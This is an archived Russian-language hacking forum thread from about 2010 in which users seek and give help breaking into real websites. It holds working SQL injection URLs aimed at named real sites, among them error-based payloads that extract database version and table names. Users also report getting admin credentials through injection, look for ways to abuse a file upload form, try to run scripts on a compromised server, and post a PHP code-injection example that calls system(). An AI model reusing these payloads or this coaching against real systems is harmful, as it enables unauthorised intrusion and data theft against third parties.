Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Да, ребяты, даже не знаю что и сказать :(

    Тоесть вот так вот просто, выходим за скобки и кавычки, и выполняем php код, да?
    Круто!!!

    А что тогда скромничать и mysql_query , выполняй уж что-то посерьёзнее =\

    Инновации хек индустрии
     
    2 people like this.
  2. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    В cgi-bin прав на запись нет, заливаю test.pl в произвольную папку, предварительно создав .htaccess c таким содержанием:
    Получаю:
    Perl точно установлен.

    В чем проблема?
     
  3. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,515
    Likes Received:
    400
    Reputations:
    196

    1) chmod +x сделай
    2) символы перевода строки "\n", а не "\r\n"
     
  4. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    попугай
    \r\n заменил на \n, права 755 и так стоят. Ошибка та же.
     
  5. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,515
    Likes Received:
    400
    Reputations:
    196

    значит Options нельзя использовать. Глянь в error_log
     
  6. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    К логам доступа нет. А Options все таки работают, т.к. без .htaccess файлы *.pl выдаются просто на скачивание.
     
  7. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    проблема скорее всего именно в нехватке прав, попробуй найти что-нибудь кроме /var/www/cgi-bin

    что-нибудь вроде

    locate default

    и попробовать поискать что-то такое:

    ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/

    может быть не только из /var/www/cgi-bin можно выполнять
     
  8. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    Так через perl test.pl все работает, так что, думаю, не в правах дело.
    Нет, нету. Да и каталог-то, в который я могу писАть, всего один.
     
  9. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    http://ashtarakkat.com/en/products/showProduct/63/
    и зделаю так..

    http://ashtarakkat.com/en/products/showProduct/63%27
    скаjите поjaлуста ето sql ??

    и как зделать ??
     
  10. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    не путай perl test.pl и запуск perl-скрипта из веба, абсолютно разные вещи.

    PS: perl test.pl будет работать в любых .*nix, если админ не изврашенец
     
  11. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    Ручками я и сейчас могу через passthru(), но на это уйдет много времени. ls, cat и т.д. - это, конечно, гибко, но не удобно.
     
  12. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Подскажите можно ли здесь подобрать:

    http://www.qatardevbank.com/ar/viewsubs.php?id=-2+order+by+5+--+

    http://www.qatardevbank.com/ar/viewsubs.php?id=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+(select+1+union+select+2+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3)x+group+by+2+limit+1)a)+--+

    http://www.qatardevbank.com/ar/viewsubs.php?id=-2+and+(select*from(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+limit+1,1),1,64),floor(rand(0)*2)))z)+--+
     
  13. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.qatardevbank.com/ar/viewsubs.php?id=-2+or+1=1+and+substring(version(),1,1)=4
    
    для начала
     
  14. ZeroCold

    ZeroCold New Member

    Joined:
    9 Mar 2010
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Да кавычки фунициклируют, ну да столбец принтабельный таким методом выудил пас и лог от админки, правда по очереди, т.е. в два запроса каждый раз обрашаясь только к первому столбцу за один запрос неполучалось, скуль 4.18, покрайней мере так н мап сказал, другим способом не узнавалось.
    Что касается загрузчика то даже не представляю как он выглядит, в смысле его код, на всей странице есть только ява
    Code:
    <!-- 3function MM_jumpMenu(targ,selObj,restore){ //v3.0 4 eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'"); 5 if (restore) selObj.selectedIndex=0; 6} 7//--> 
    но что то мне подсказывает отношения к загрузке это не имеет. :)
    Что касается самой конопки загрузки то фаер баг очень скупо о ней отзываеться
    Code:
    <input type="file" name="img_mini">
    - об окне ввода пути откуда загружать
    Code:
    <input type="submit" value="Вставить файлы" id="files" name="files">
    - собственно кнопка заливки. Есть идеи как это можно проэксплуатировать? )
     
  15. GivioN

    GivioN Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    45
    Likes Received:
    10
    Reputations:
    0
    Получается да. Проверил на локалке все работает

    А чего тогда скуль раскручивать в гет запросах, хеши какие-то пытаться вытягивать? Не... я просто новичек, может опять чего-то не понимаю

    Это цветочки... Уже есть идеи как магик.квотес обходить.
     
  16. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    А, ну тогда нормально, ты хакер
    Да не запаривайся ты. Раз у тебя на локалке работает то, что ты показывал, ломай интырнеты!

    Ну сам подумай, вот допустим код:
    PHP:
    $id $_GET['id'];
    echo 
    "$id";
    А ты его вот так :
    test.php?id=1']; system('ls -la'); // пыщ-пыщ!111

    Если тот пример работает, то почему-бы этому не сработать?

    Grey: даже особые обстоятельства Пашкелы не сравнятся с новым методом ^_^
     
    #12176 Kakoytoxaker, 5 Apr 2010
    Last edited by a moderator: 5 Apr 2010
    3 people like this.
  17. GivioN

    GivioN Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    45
    Likes Received:
    10
    Reputations:
    0
    Классно!!! А я думал хакеров нету :)

    ну да... с гетами это не работает, наверно потому что кодировка менется, хотя вам лучше знать
     
    #12177 GivioN, 5 Apr 2010
    Last edited: 5 Apr 2010
  18. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    и зделаю так..

    скаjите поjaлуста ето sql ??

    и как зделать ?
     
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,550
    Likes Received:
    1,252
    Reputations:
    274
    Вопрос знатокам: есть форум ибф Powered by*Invision Power Board(U) v1.3 Final © 2003 *IPS, Inc.
    Русский Модифицированный IPB v1.3 Final © 2003*BesTFileZ.Net*&*IBR Team*.Через скулю нашел хеш админа, выполняю вход, и потом когда хочу зайти в админку мне помимо пароля просит ввести еще личный код админа.Собственно и сам вопрос где в базе хранитыса данный код? и если хранится он в базе.
     
  20. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    Тоже встречал такое.. Админы ставлят на админку еще бейс авторизацию и зачастую логин и пасс находится НЕ в бд. Если FILE_PRIV: Y , то читай файлы админки
     
Loading...
Thread Status:
Not open for further replies.